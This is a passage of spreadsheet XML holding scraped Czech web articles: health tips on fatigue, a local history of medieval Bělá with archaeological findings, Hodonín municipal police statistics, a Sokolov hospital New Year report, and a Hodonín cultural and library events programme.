je nebezpečné onemocnění, které se může závažně podepsat na vašem zdraví nebo způsobit smrt. Pozor na tyto varovné příznaky. Některé příznaky rakoviny se mohou objevit klidně i 2 roky předtím, než k samotnému onemocnění […] 9. září 2021 Lenka Burešová Rakovina vaječníků se považuje za jeden z nejvíce smrtelných druhů rakoviny týkajících se žen. Řadí se také mezi nemoci s pozdní diagnózou. Poznejte ji včas podle jasných signálů, které popsala lékařka Christina Chun. […] 27. května 2016 Nikol Sotolářová Česká republika patří k největším producentům piva na světě. Naše pivo je velmi oblíbené v zahraničí, například v USA . Po celém světě byste však naši pivo v různých zemích, existuje až na 400 druhů piv . Nejvíce jich je v Belgii . […] Vyhledávání Autor: Lenka Burešová Autor person Lenka Burešová Rubrika transition_slide Nemoci</t>
  </si>
  <si>
    <t>20250101_387_3693563409_36a1036224011a30b23d.html</t>
  </si>
  <si>
    <t>36a1036224011a30b23d</t>
  </si>
  <si>
    <t>Za neustálou únavou stojí časté příčiny. Na vině může být i nedostatek bílkovin a tekutin</t>
  </si>
  <si>
    <t>Za neustálou únavou stojí časté příčiny. Na vině může být i nedostatek bílkovin a tekutin Neustálá únava může být důsledkem řady faktorů, z nich většinu můžete sami ovlivnit. Důležitá je zejména zdravá strava a cvičení. V současné době plné spěchu a stresu se často stává, že se lidé i po vydatném spánku budí unavení a bez energie. Pokud je to i váš případ, nemusíte nicméně podle lékařky Elaine K. Luo užívat komerční prostředky nebo pít několik šálků kávy. Naopak byste se měli zaměřit na změnu životního stylu, a to především co se týká cvičení a nastavení vhodného stravovacího plánu. Dále také myslete na dostatečnou hydrataci svého organismu. Jak se zbavit neustálé únavy Pokud vás trápí neustálá únava, měli byste se zaměřit především na svou stravu, zmiňuje Natalie Olsen. Váš jídelníček by měl zahrnovat dostatek vlákniny a bílkovin, které pomáhají udržovat hladinu energie v normálu a vyžadují delší čas pro trávení. Dobré je také začít konzumovat více potravin s obsahem antioxidantů, které čistí organismus. Neméně důležité je poté pravidelně cvičit, protože tím dochází k uvolnění důležitých endorfinů. Právě tyto hormony podle webu Healthline přirozeně zvyšují energetickou hladinu a podporují lepší spánek. Pokuste se proto alespoň několikrát týdně provádět vhodný pohyb, ať už posilování s činkami, běh, či například plavání. Skvěle tím podpoříte chod těla a zrychlíte tím svůj metabolismus, tudíž únava začne pomalu ustupovat. Stejně tak byste se měli zaměřit na pití dostatku tekutin. Ty jsou nezbytné pro optimální funkci celého organismu. Rizika nízkého hematokritu není radno podceňovat. Hrozí i únava a srdeční komplikace Dehydratace navíc může dle doktorky Angelicy Balingit vést k nízké hladině energie a zhoršovat spánek. Dále zvyšuje riziko chrapotu a křečí, které jsou další nepříjemnou potíží omezující pohodu jedince. Obecně je poté dobré omezit konzumaci kofeinu, protože si vůči němu můžete postupem času vybudovat odolnost. Když poté bude tělu chybět, povede to k silnější únavě, než je běžné. Na Zdravém Stravování jsme také psali, že únava může být příznakem nízkého hematokritu. 29. srpna 2020 Lenka Burešová Narušení rovnováhy v těle, kdy se objeví i toxiny, je nejčastěji způsobeno stravou. Bohužel může přinášet i mnoho nepříjemných komplikací nebo dokonce vážná onemocnění. Výživa je velmi důležitá pro udržení příznivého stavu pH v těle. Některá jídla však tělo okyselují, což se stává spouštěčem buněčného rozpadu a vážných onemocnění. […] 13. října 2020 Lenka Burešová Vaginální infekce je velmi nepříjemný problém. Bohužel, je ale také velmi častý. Zkušenost s ním mají především ženy od 15 do 40 let. Typickými projevy jsou pálení a svědění v oblasti genitálií. Naopak muži tímto typem infekce trpí málokdy. […] 20. března 2020 Gabriela K Koronavirus představuje mnoho nejistot a nikdo z nás nemůže zcela eliminovat riziko, ale je tady jedna věc, kterou můžeme udělat, to je jíst zdravě a zaměřit se na dostatečný příjem některých vitamínů a látek. Vynikající osobní hygiena, ohleduplnost a nošení roušek, včetně příjmu živin a dále určitě i pohyb (cvičit se dá i doma) a otužování, přispěje k posílení imunity. […] 22. února 2020 Lenka Burešová Cibule je základem naší kuchyně. Kromě toho, že se bez ní neobejde řada jídel, se bez ní neobejde ani naše tělo. Pro něj má velký přínos. Dokonce takový, že pokud řekneme, že se při pravidelné konzumaci cibule obejdeme bez běžných léků, budeme mít pravdu. Podívejte se s námi na výčet faktů, které jste o cibuli dost možná nevěděli. […] 5. února 2021 Lenka Burešová Hypertenze neboli vysoký krevní tlak je v České republice poměrně rozšířená, zejména mezi staršími lidmi. Rozvoji vysokého tlaku nahrává nezdravý životní styl – podporuje jej nadměrná konzumace alkoholu a kouření, ale také nedostatek zdravého pohybu, nadváha nebo obezita a špatné stravování. […] 18. března 2023 Lenka Burešová Hypochlorhydrie je nebezpečné onemocnění, které může mít závažné dopady na vaše zdraví. Je proto důležité, abyste včas rozpoznali jeho příznaky. […] Vyhledávání Autor: Tereza Vohrlíková Autor person Tereza Vohrlíková Rubrika transition_slide Rady a tipy</t>
  </si>
  <si>
    <t>20250101_388_3696934084_19bf0f49a7082ee06cc7.html</t>
  </si>
  <si>
    <t>19bf0f49a7082ee06cc7</t>
  </si>
  <si>
    <t>Díl I. - Jindřich II. Kruhlata z Michalovic a Jan Smiřický.</t>
  </si>
  <si>
    <t>Díl I. - Jindřich II. Kruhlata z Michalovic a Jan Smiřický . Městské knihy a listiny uchovávané představiteli města byly většinou majetkové povahy a týkaly se jak majetku a práv města, tak majetku a práv jednotlivých měšťanů. To lze konstatovat i u zápisů a listin církevních i vrchnostenských. Děje a podoby určitého období města se z nich, pokud vůbec jdou, skládají velmi obtížně. Tak například neznáme podobu původního hradu či tvrze a na počátku námi sledovaného období by se dalo z absence psaných zpráv o opravě či výstavbě hradu či tvrze v Bělé předpokládat, že byl ještě pobořený. Roku 1453 byl hejtmanem na Bělé Markvart z Martinic, ale o stavu a podobě hradu či tvrze opět nic nevíme. Zda byl purkrabím na Bělé ještě Jaroš z Nosálova, nebo již Jan Těžký, se lze jen dohadovat. Bělská vrchnost Jindřich II . Kruhlata z Michalovic sídlil na hradě v Mladé Boleslavi , který nechal stavebně upravit a na opravu či výstavbu vojensko-správního objektu v Bělé nemusel spěchat. Nedaleko totiž stál netknutý a přepevný hrad Bezděz , který měl i nadále Jindřich II. Kruhlata z Michalovic spolu s bezdězským panstvím v zástavě. Oproti tomu závěry ze záchranného archeologického výzkumu na zámku v Bělé (v rámci rekonstrukce části interiérů zámku na „Informační centrum s expozicemi“ pod vedením Mgr. Jarmily Švédové z Ústavu archeologické a památkové péče středních Čech ) znějí jinak. Archeologická sondáž v interiérech přízemí jižního a západního křídla zámku, nádvoří, vstupu do zámku a parkánu na jižní straně objektu probíhala v období od května do září 2014. Celkem bylo vykopáno 13 archeologických sond, přičemž v některých byly zachyceny pozůstatky starší stavební fáze hradu (či tvrze). Sonda č. 4 a 5 v přízemí jižního křídla zámku zachytila v místě sondy č. 4 několik starších úrovní podlah. V hloubce 30 cm se pod současnou podlahou nacházela podlaha z hliněných pálených dlaždic (půdovek) o velikosti 20 x 20 cm, pod ní dřevěná prkenná podlaha a stratigraficky nejníže hliněná dusaná podlaha opatřená vápenným nátěrem. V úrovni dřevěné a dusané podlahy byly na obvodovém zdivu objektu dokumentovány i dvě vrstvy gotických omítek opatřených vápenným nátěrem, které se vyskytovaly níže pod mladšími kletovanými omítkami. Z vrstev ležících stratigraficky pod dusanou podlahou pochází keramický materiál datující situaci do vrcholného středověku – poloviny 15. století. Nejníže se nalézal gotický „předzáklad“ obvodové zdi zámku (původního gotického paláce, II. fáze) a několik zlomků keramiky. Dusaná hliněná podlaha je doložena v naprosto identické úrovni i v sondě č. 5. Tato zjištěná skutečnost dokládá, že se původně jednalo o jednu velkou prostoru, kterou v období renesance předělila zděná příčka. Sonda č. 10 a 11 u vstupu do suterénu z místnosti přiléhající k průjezdu objevila pod cihlovou novodobou podlahou gotické zdivo, které druhotně sloužilo jako „předzáklad“ pro mladší gotickou zeď. Ve stejné místnosti, v místě původní (v baroku zazděné) branky pro pěší, došlo k sekundárnímu užití gotických architektonických prvků zdiva, především fragmentů portálů a ostění, jako stavebního materiálu. V centrální části místnosti se v místě sondy č. 10 objevily pozůstatky gotického zdiva zděného na vápennou maltu. Zjištěná výška zdiva cca 2 m nasedala přímo na podloží tvořeném skálou – pískovcem. Profil zdiva nesl patrné znaky přepálení, které pravděpodobně souvisí s požárem původního vstupního objektu hradu, kdy bylo destruované zdivo ponecháno na místě a poté rozhrnuto v ploše jako zásyp. Na základě charakteru a enormní tloušťky zdiva lze zjištěnou situaci interpretovat jako část věže či vstupního objektu. Velikost sondáže nám bohužel neumožňuje zjištěnou situaci spolehlivě vyhodnotit. Sonda v průjezdu byla z větší části opět vyplněna zdivem, bohužel porušeným výkopy pro vodovod a kanalizaci. V těsné blízkosti před vstupem do zámku se v hloubce cca 25 cm pod současným povrchem objevila maltová podlaha původně lokalizovaná v interiéru objektu. Půdorys gotického hradu byl tedy předsunut do hradního příkopu, oproti současné dispozici zámku. S jistotou můžeme říct, že v období před polovinou 15. století stála na ostrožně v Bělé tvrz, která měla dvě patra sklepů (potvrzeno archeologickým výzkumem ZIP Plzeň), přízemí a první patro v místě dnešního západního křídla jižně od vstupu do zámku. Rovněž můžeme s jistotou tvrdit, že v místě dnešního vstupu do zámku stála věž, která byla dispozičně vysunuta západním směrem před současnou zástavbu. Nejpozději v polovině 15. století vyrostl jižní trakt hradu, který je archeologicky doložen až po druhý opěrný pilíř, přičemž lze předpokládat, že půdorysně bylo křídlo delší, nejspíše až ke čtvrtému opěrnému pilíři. Existenci mladší fáze výstavby jižního křídla dokládá i objevení zazděného gotického okna. Otázkou zůstává podoba hradeb, především na východní a severní straně, kde mohla stát další věž či jiný fortifikační prvek… JOSEF UMLAUF - DĚJEPIS… STR. 57 1450 - Ku klášteru bělskému mlýn koupen Ku klášteru bělskému ještě před válkou husitskou patříval mlýn pod městem u lázně a v těch bouřkách klášteru od mnichů opuštěném odjat jest. 1450 - Převor Vaněk Nyní za času purkmistra Matějky kněz Vaněk převor kláštera bělského koupil ten odjatý mlýn pod městem u lázně za 10 kop grošů dobrých i zaplatil jej, a ten jest koupil k záduší a bratřím svým téhož kláštera, ode tří majitelů: Diviše z Boleslavě, Matěje - mlynáře Podhradského - a Janka na Žehrově. [: viz listin stranu 106. číslo XLVIII.:] 1450 - Klášteru louka dána Též toho roku Petr Myška z Bělé dal louku svou pod ,,Psí horkou“ knězi Vaňkovi i jeho bratřím ku klášteru v Bělé , aby se dála památka za něho a jeho budoucí. Ta louka ležela vedlé louky Křížkové. Tyto dva pády dokazují, že v Bělé zase mniši v klášteře bělském žili a i od obyvatelstva již (DOKONČENÍ NA STR. 58) pronásledování nebyli. 1450 - Lazebník Téhož léta Petr kovář bělský koupiv si místo mezi Redfilem a Jankem lazebníkem a vystavěl si na něm dům. [: viz listin stranu 237. č. CXLV.:] 1450 - Mlýn druhý pod městem Téhož léta. Druhý mlýn od města (snad nynější Holúbkovský:) patřil Mykšovi mlynáří a ten pustil synu svému Havlovi za 15 kop. Běla se píše městem královským. Mšeno i Bezdězí Téhož léta Jan ze Zebic Markétě ze Mšena bábě své, Bětce ze Slivna , matce své, a Oldřichovi ze Mšena , ujci svému, 250 kop zapisuje na dědinách svých manských v Zebicích k Bezdězí sloužících. [Arch. č. str. 548. díl III] 1452 - Jiří Poděbrad správcem Léta Božího 1452 pan Jiří z Kunštatu a z Poděbrad zvolen jest za nejvyššího správce všeho království v Praze na velikém sněmu. Bezdězí Pan Jindřich Kruhlata z Michalovic na Mladem Boleslavi a na Bezdězí, pán města Bělé , jest přidán k radě gubernátora české země Jiřího z Poděbrad i s Janem ze Smiřic, švakrem jeho, a byl později až do 1471 nejvyšším komorníkem krále Jiřího. Jindřich II. Kruhlata z Michalovic , narozen okolo roku 1420, zemřel na následky zranění z boje v polovině roku 1468. Jeho rodová větev uváděna s přídomkem Kruhlata. Mládí a dětství prožil na hradech Hrubý Rohozec a Bezděz . Po smrti otce Jana IV. Kruhlaty z Michalovic (1435 nebo 1436) mu připadlo rodové dědictví. Byl ženatý s Annou z Pirkštejna , rozenou z Hradce . Bělskou vrchností byl v letech 1437–1445 a 1453 - 1468. Přes Annu byl příbuzným Jiříka z Poděbrad . Písař Vaněk Radní písař města Bělé koupil 4 pruty rolí od Bartoše Hladíka za 15 kop groší. 1453 - Jan Smiřický sťat Jan Smiřický pocházel z málo významného zemanského rodu a prvně je zmiňován v roce 1415 jako jeden z vyšehradských manů. Zemřel při veřejné popravě na Staroměstském náměstí v roce 1453. Jeho manželkou byla Markéta z Michalovic , sestra Jindřicha II. Kruhlaty z Michalovic . Jan ze Smiřic byl sice méně urozeným, ale majetným a vlivným příbuzným. Bělskou vrchností byl v letech 1445 - 1453. Sťat jest v Praze na Starém náměstí, ten pátek před narozením Panny Marie, pod urozený a znamenitý rytíř pan Jan Smiřický , pan na Rúdnici a Housce, protože knížete Ladislava mladého písemně varoval a radil, by do Prahy pro korunu českou nejezdil, jestli dvě hlavy nemá (popravu zrádce bez soudu nařídil Jiřík z Poděbrad ). Král Ladislav (Z rodu Habsburků, narozen 22. 2. 1440, zemřel 23. 11. 1457, korunován českým králem 28. 10. 1453) Téhož léta, Ladislav patnáct let starý, volený král český, přijel přes Jihlavu a Kutnou Horu do Prahy , slavně korunován jest dne 28. října. JOSEF UMLAUF - DĚJEPIS… STR. 59 1453 - Cena potravin Tehdáž v Čechách lacino bylo: korec žita platil 2 groše, vajec 14 za jeden peníz; herynků 20 za 7 peň; ovsa korec za 3 groše malé; věrtel piva 7 gr.; mláto v Praze na břeh vozili; malvasí žejdlík za 6 neb 7 peň; vína uherského žejdlík za 4 peň.; patočkův pinta za 1 peň.; starého piva půl pinty za 1 peníz, 60 krav bylo za 100 grošů; 100 ovec za 1 kopu, kámen vlny za 15 grošů; postava sukna žitavského 7-8 grošů, loket sukna za 15 penízů a loket sukna hrubého za 7 penízů, korec hráchu za 4 groše, velká houska chleba za 1 peníz, ptákův velkých 12 za 1 groš a drobných 50 za 3 peníze; 2 koroptví za 7 penízů; podbříšková čuba (oděv) za 3 kopy; věrtel soli za 7 grošů. V Litoměřicích 2 žejdlíky vína za 1 haléř a v Praze českého výborného vína 1 žejdlík za haléř. To jsou ceny pražské, na venkově muselo ještě laciněji býti. 1453 - Cařihrad dobyt Téhož roku dobyli Turci řecké císařství i hlavní město Cařihrad čili Konstantinopole . 1453 - Nové desky městské Téhož léta rada města Bělé založila knihu zápisní pro smlouvy a paměti právní rozličné a začíná jazykem latinským.</t>
  </si>
  <si>
    <t>2150</t>
  </si>
  <si>
    <t>20250101_389_3696918151_1aa863e28e1affb3f9d9.html</t>
  </si>
  <si>
    <t>1aa863e28e1affb3f9d9</t>
  </si>
  <si>
    <t>Statistika některých údajů od 13. 11. do 8. 12. 2024</t>
  </si>
  <si>
    <t>Statistika některých údajů od 13. 11. do 8. 12. 2024 Zjištěno a řešeno přestupků a událostí: Proti bezpečnosti a plynulosti silničního provozu 108 Proti veřejnému pořádku 8 Proti občanskému soužití 1 Proti majetku 13 Odchyceno psů 6 Zjištěno a předáno PČR trestných činů 1 Uloženo blokových pokut 74 Pokuty celkem 98 400 Kč Z toho na místě nezaplacené 70 200 Kč • Při kontrole nádraží ČD dne 15. 11. v 8.15 spatřili strážníci muže, který u vstupu do vestibulu pil alkohol . Byl opilý a pivo , které držel v ruce, díky svému stavu rozléval. Za porušení vyhlášky zakazující konzumaci alkoholu na tomto místě mu uložili pokutu ve výši 1000 Kč. • Dne 15. 11. přivezla sanitka Zdravotnické záchranné služby pacienta, který se choval agresivně. Pod vlivem omamných látek se vytrhl z popruhů lehátka a zaútočil na strážníka. Ke zpacifikování této agresivní osoby bylo nutné použít donucovací prostředky včetně pout. Kvůli neustálé agresivitě pacienta musela hlídka lékařům po celou dobu vyšetření asistovat. Po vyšetření byl dotyčný muž utlumen léky, aby mohl být umístěn na ARO. • Obavy o svého souseda sdělil dne 16. 11. strážníkům muž, který uvedl, že soused má otevřené dveře od bytu a na volání neodpovídá. Strážníci za doprovodu oznamovatele vstoupili do bytu. Souseda nalezli v bytě v pořádku, byl jen poněkud společensky unavený a spal. • Podobný případ se šťastným koncem řešili strážníci dne 28. 11. V tomto případě přijali dokonce podezření na úmrtí osoby v bytě. Dle oznamovatelky starší žena neodpovídá, klíče jsou v zámku zevnitř bytu. Na místo byli přivoláni hasiči k otevření bytu a také Policie ČR z důvodu podezření na úmrtí. Po otevření bytu byla paní nalezena na zemi, zmatená, ale živá. Přivolaná sanitka odvezla ženu k vyšetření do nemocnice. • Upozorňujeme řidiče na změnu dopravní situace v okolí vlakového nádraží. Již od sochy T. G. Masaryka je nově označena zóna placeného parkování, která končí až na konci jednosměrné ulice Sv. Čecha u křižovatky s ulicí Dvořákovou. V celé této zóně se smí stát pouze na vyznačených parkovacích místech, a to po zaplacení parkovacího poplatku. Žádné jiné místo mimo vyznačených parkovacích míst není k parkování možné využívat. • Se začátkem nového roku děkujeme všem obyvatelům i návštěvníkům za spolupráci v minulém roce. Této spolupráce si velmi vážíme. Vaše pozornost a ochota oznámit nám vámi zpozorované situace, nám v naší práci velmi pomáhá. Webové stránky Městské policie Hodonín : www.mphodonin.cz Mgr. Jindřich Vašíček, ředitel MěP Hodonín</t>
  </si>
  <si>
    <t>20250101_39_3704430170_c5b308987d922f428efe.html</t>
  </si>
  <si>
    <t>c5b308987d922f428efe</t>
  </si>
  <si>
    <t>Sokolovská nemocnice: Silvestrovské zranění a šťastný začátek roku</t>
  </si>
  <si>
    <t>Sokolovská nemocnice: Silvestrovské zranění a šťastný začátek roku Lékaři v sokolovské nemocnici za sebou mají náročnou silvestrovskou noc. Ošetřovat museli zranění různého rozsahu. Většina případů byla bez přímého ohrožení života a po ošetření byli pacienti propuštěni domů. Kromě drobných úrazů se doktoři zabývali například i zlomeninou krčku či tržnými ranami, kde bylo nutné zašít kůži i podkoží. Ve velké míře byla zranění spojena s konzumací alkoholu . Přesto byli hospitalizováni jen 3 pacienti. První miminko roku 2025 se v Nemocnici Sokolov narodilo v 7:33 hodin. Holčička Laura vážila 3 700 gramů. Jednalo se o ambulantní porod, ale vše dobře dopadlo a maminka si novorozence odvezla domů ještě během dnešního dne.</t>
  </si>
  <si>
    <t>20250101_390_3696918123_87a74edba601f8ce3abd.html</t>
  </si>
  <si>
    <t>87a74edba601f8ce3abd</t>
  </si>
  <si>
    <t>KULTURNÍ SERVIS • VOLNÝ ČAS Dům kultury Hodonín Horní Valy 3747/6, 695 01 Hodonín www.dkhodonin.eu 1. 1. 2025 | od 16.00 | Masarykovo náměstí Hodonín Novoroční ohňostroj Přijďte společně s dětmi oslavit začátek roku 2025 16.00 – výdej česnečky 16.15 – animované pohádky pro děti 17.00 – projev starosty města a společné odpálení ohňostroje Vstup volný 6. 1. 2025 | 19.00–21.00 | Dům kultury Hodonín Novoroční koncert se slavnostním přípitkem Tradiční zahájení nového roku v podobě novoročního koncertu s přípitkem starosty města I. Koncert: 19.00–19.45 ( Radka Fišarová , muzikálová a šansonová zpěvačka) Přípitek: 19.45–20.15 II. Koncert: 20.15 – 21.00 (Funky Selection Band ZUŠ Hodonín ) Vstupné 180 Kč 10. 1. 2025 | 20.00–02.00 |Dům kultury Hodonín Taneční ples Tradiční ples pro milovníky klasického tance. K poslechu a tanci zahraje SW Band Brno Zdeňka Svobody, tanečním večerem provede taneční lektorka Klára Adamová . Součástí plesu bude doprovodný program, tombola. Vstupné 250 Kč/pro absolventy tanečních kurzů Domu kultury Hodonín ZDARMA 11. 1. 2025 | 19.30–02.30 | Dům kultury Hodonín Farní ples Pořadatel: Římskokatolická farnost Hodonín 11. 1. – 12. 1. 2025 | 9.00–13.00 | Dům kultury Hodonín Výběrové kolo Věneček z rozmarýnu – kinosál Domu kultury 25. 1. 2025 | 20.00–03.00 | Dům kultury Hodonín Reprezentační ples města Hodonína Tématem plesu je Commedia dell'arte. Nechte se uchvátit krásou benátské renesance a zažijte tento dech beroucí večer. Účinkují: Zatrestband Richard Krajčo a Nikolaos Grigoriadis Cimbálová muzika Grajcar Jan Štifter – DJ Rádia Jih Bohatý doprovodný program Vstupné 590 Kč/ 690 Kč/ 790 Kč PŘIPRAVUJEME NA ÚNOR 2025 4. 2. 2025 – Partička na vzduchu 7. 2. – 8. 2. 2025 – Výstava „Stavba-Teplo-Energie-Veletrh úspor“ 16. 2. 2025 – Fichtl – divadelní představení 18. 2. 2025 – Seriál dechových hudeb –Textilanka 21. 2. 2025 – Ples Gymnázia 22. 2. 2025 – Country bál 23. 2. 2025 – Divadélko babičky Běty 24. 2. 2025 – Proplačte se ke štěstí aneb Cry Baby Cry – divadelní představení 25. 2. 2025 – Ludovico Einaudi Music – klavírní koncert 27. 2.2 025 – Poletíme? – Hvězdy těžký tour maj – koncert Kino Svět Hodonín Velkomoravská 1535/9, 695 01 Hodonín tel. pokladna 601 169 169, pokladna.kino@dkhodonin.cz, www.kinosvet.eu Nosferatu | premiéra 3. 1. | 20.00 | horor LiStOVáNí.cz: Historky z Tinderu 2 (Lucie Macháčková) 7. 1. | 20.00 | živě Tady Vary 5 8. 1. | 19.30 | festival Paddington v džungli | předpremiéra 26. 1. | 13.45 | rodinný Popelka | Královský balet 26. 1. | 16.30 | balet Městská knihovna Hodonín Národní třída 36 – tel.: 518 321 213, 724 055 952 • pobočka Brandlova 81 – tel.: 518 321 212 , 725 965 653 • www.knihovnahod.cz VÝSTAVNICTVÍ 4. 1. – 1. 2. 2025 / Jiří Hiršl / OVÍNĚN / Galerie Vednevnoci Výstava fotografií, malby a kresleného humoru hodonínského výtvarníka Jiřího Hiršla. Vernisáž se uskuteční ve čtvrtek 9. ledna v 18.00. 30. 11. – 31. 1. / Výstava výtvarných prací z projektu Od A do Zet Ivony Březinové / Plácek a Výstavní sál Děti tvořily návrh obálky libovolné knihy spisovatelky Ivony Březinové nebo koláž z obálek a návrhů knih. Přijďte se podívat, jak se jim to povedlo. AKCE Čtvrtek 9. 1. / SONS poradenství pro zrakově postižené Odborné poradenství poskytne sociální pracovnice SONS Kyjov Hana Vrtková. 10.00–12.00 / ProSenior Čtvrtek 9. 1. / Černobílé country povídání Taneční klub Black and White má na svém kontě přes sto titulů Mistra Česka i Slovenska v country tancích. Přijďte se s námi ohlédnout za třiceti protančenými lety, zjistit novinky a zajímavosti z klubu. Tanečníci předvedou ukázky amerického stepu a ještě něco navíc. Malí tanečníci a tanečnice vítáni! 17.00 / Přednáškový sál Pondělí 13. 1. / Telekomunikace v kostce – Český telekomunikační úřad Lektorka JUDr. Alena Sejková poradí, jak se orientovat ve světě telekomunikací a v nabídce služeb operátorů. Upozorní na nástrahy při uzavírání smluv a doporučí způsoby, jak se jim vyhnout a kam je třeba se obrátit v případě problémů. 10.00 / Zasedací sál Pondělí 13. 1. / 4000 km pěšky přes Evropu – z východu na západ Zážitky Michala Vrbovského, mladého cestovatele, který se vydal na pouť Evropou . Proč vyrazil na tak dlouhou cestu, jaká prožil dobrodružství, co by teď jako zkušený cestovatel udělal jinak? O to vše se s námi podělí na své přednášce. 17.00 / Přednáškový sál Středa 15. 1. / American school system vs Czech school system with Blair Anglická konverzace s Blair, tentokrát o školním systému. 17.00–18.00 / Přednáškový sál Čtvrtek 16. 1. / Tetičko, ušijte mně kroj Beseda s Ludmilou Krátkou, autorkou knihy Tetičko, ušijte mně kroj. Knihu vydala vlastním nákladem v roce 2020. Zapsala a nafotila v ní vše, co se týká severokyjovské varianty kroje z přelomu 20. a 21. stol. Najdete v ní spoustu informací, rad a návodů, co naše tetičky, babičky i prastařenky znaly a předávaly si z generace na generaci. Přijďte se podívat a zeptat se na vše, co vás o krojích zajímá. 17.00 / Přednáškový sál Středa 22. 1. / Troj-boy / Teatrál Hodonín O spojení příběhů, rapu a živé hudby z Hodonína se postará pánské trio z hodonínské divadelní party Teatrál. Lukáš Ivánek, Jimmy Jones a Petr Vaculovič se pustí do fúze žánrů, které si jsou blíže, než se může zdát. Mimo jiné představí novinku, kterou začíná zkoušet pro své divadelní představení. Jde o dramatickou story Mrcha z Hodonína inspirovanou příběhem o Jezábel a zasazenou do kulis současného města. 17.00 / Přednáškový sál Čtvrtek 23. 1. / Drogy Přednášející pan Zdeněk Majzlík se zaměří na otázky: Co jsou drogy? Jaký je jejich účinek? Kdo a proč je užívá? Co dál? Přijde nějaká změna? Pokud ano, musí přijít velmi brzy, jestli se nechceme dostat do podobné situace, jaká je v některých západních státech. 17.00 / Přednáškový sál Každá středa / Čeština pro cizince 15.30–16.30 začátečníci a 16.30–18.00 mírně pokročilí. Lektorka Mgr. Jana Lamačová. Zasedací sál Není-li uvedeno jinak, vstupné zdarma. Změna programu vyhrazena. DĚTSKÉ ODDĚLENÍ A ZAŠÍVÁRNA Čtvrtek 16. 1. / Škvrňata a batolata do knihovny natotata Pohádkování s Ingrid Nesvadbovou v rámci celorepublikového projektu Bookstart aneb S knížkou do života. 9.00–9.30 a 10.00–10.30 / Oddělení pro děti Pátek 17. 1. / Tvořivá dílna Záložka do knihy Tentokrát budeme s lektorkou Michaelou Záleskou tvořit záložku do knihy. Jako základ poslouží výstřižky z novin a různých periodik. 14.00–17.00 / Přednáškový sál Pátek 24. 1. / Výtvarná dílna Náramek technikou macramé Naučíme se základy techniky macramé. Spolu s lektorkou Miladou Češkovou si touto technikou vytvoříte náramek pro štěstí s korálky a uzlíky. 14.00–16.00 / Oddělení pro děti Každý pátek / Deskové hry pro děti Hrajete rádi deskové hry? Chcete potkat nové kamarády a spoluhráče, vyzkoušet něco nového? Využijte možnost zahrát si deskovku. Věková hranice 8+, mladší děti s doprovodem. 14.00–16.30 / Oddělení pro děti Klub CoderDojo Máš 7–17 let a baví tě programování? Přijď se podívat do našeho klubu CoderDojo. Přihlašovat se můžete průběžně, přihlášku najdete na našich webových stránkách nebo přímo v knihovně v Oddělení pro děti nebo na pobočce v Brandlově ulici. Přihlášku vyplňte a vezměte si ji s sebou do knihovny. Středa 8. 1. / 22. 1. / CoderDojo 3D tisk s Danielem Králem. 16.00–18.00 / PC učebna Čtvrtek 9. 1. / 23. 1. / CoderDojo Lekce programování a robotiky s Matyášem Vrňákem. 16.00–18.00 / PC učebna Čtvrtek 16. 1. / 30. 1./ CoderDojo Audiovizuální koutek s Tomášem Theuerem. 16.00–18.00 / PC učebna ProSenior Pondělí 13. 1. / 20. 1. / 27. 1. / Cvičení Tai Chi pro pokročilé Informace na telefonu: 772 269 843. 18.00–19.00 / Oddělení pro dospělé Úterý 14. 1. / 28. 1. / Hrátky s pamětí Tradiční procvičování mozkových závitů v podání lektorky Milady Češkové. 9.30–10.30 / Zasedací sál Čtvrtek 16. 1. / 23. 1. / 30. 1. / Cvičení na židli a u židle Protahovací a posilovací cvičení s prvky Tai Chi a Čchi-Kung. 9.30–10.30 / Zasedací sál Každé úterý a čtvrtek / Deskové a karetní hry Přijďte si zahrát karetní a deskové hry do knihovny. 10.30–13.30 / ProSenior V LEDNU PŘIHLAŠUJEME: VIRTUÁLNÍ UNIVERZITA TŘETÍHO VĚKU – jaro 2025 Jarní semestr VU3V bude probíhat od 4. února do 15. dubna 2025. Garantem je Česká zemědělská univerzita Praha . Přednášky se budou konat v zasedacím sále Městské knihovny Hodonín. Přihlašovat se mohou stávající i noví studenti od 2. 1. 2025 do 31. 1. 2025 v oddělení pro dospělé. Cena kurzu pro členy knihovny 480 Kč, ostatní 520 Kč. Informace o tomto projektu získáte na stránkách https://vu3v.cz/, v Městské knihovně Hodonín a na webu www.knihovnahod.cz Výukové téma tohoto semestru: Osobnosti světové moderní architektury. Přednášky posluchače seznámí se světovou architekturou 20. století, jejími směry, styly a nejznámějšími osobnostmi a jejich dílem. UNIVERZITA VOLNÉHO ČASU – jaro 2025 Chcete se něco dozvědět a naučit? Získat spoustu nových zkušeností a znalostí bez testů a zkoušek? Přihlaste se do kurzů naší Univerzity volného času. Přihlašování do kurzů uvedených níže bude probíhat od 2. 1. 2025 do 31. 1. 2025. Přihlásit se můžete v Městské knihovně Hodonín v oddělení pro dospělé nebo přes online formulář na webových stránkách knihovny. Držitelé čtenářského průkazu (ČP) mají zvýhodněnou cenu. Kurzy je nutno uhradit před jejich zahájením. Po zahájení kurzu se kurzovné nevrací. Kurzy: Umělá inteligence kolem nás Čtyřdílný cyklus praktických webinářů pro začátečníky o tom, jak umělá inteligence ovlivňuje svět kolem nás a jak ji můžeme využívat a usnadnit si naši práci a každodenní život. Na kurzu se naučíte efektivně pracovat s moderními nástroji využívajícími AI, jako ChatGPT, NotebookLM, Consensus a Copilot. Lektor: Mgr. Radek Petřík, Ph.D. Online webinář Úterý 16.00–17.30, 6 hodin, 4 lekce Cena kurzu: s ČP 330 Kč, bez ČP 360 Kč, nad 70 let s ČP 270 Kč, bez ČP 300 Kč Notebooky pro seniory Kurz zaměřený na osvojení základních dovedností práce s notebookem, jako je ovládání zařízení, psaní na klávesnici a vyhledávání informací na internetu. Součástí kurzu je také práce s programy Microsoft Word a Excel, které jsou určeny pro tvorbu textových dokumentů a tabulek. Kurz je vhodný pro začátečníky i mírně pokročilé uživatele. Lektor: Tomáš Theuer Úterý 15.00–17.00, 8 hodin, 4 lekce Cena kurzu: s ČP 440 Kč, bez ČP 480 Kč, nad 70 let s ČP 360 Kč, bez ČP 400 Kč Základy práce s chytrými telefony Kurz je zaměřen na osvojení základních dovedností při používání chytrých telefonů. Kurz je vhodný pro začátečníky, kteří chtějí lépe porozumět funkcím chytrých telefonů a efektivně je využívat v každodenním životě. Lektor: Daniel Král Čtvrtek 14.00–16.00, 8 hodin, 4 lekce Cena kurzu: s ČP 440 Kč, bez ČP 480 Kč, nad 70 let s ČP 360 Kč, bez ČP 400 Kč Google aplikace Kurz je zaměřen na seznámení s užitečnými nástroji od společnosti Google . Účastníci se naučí pracovat např. 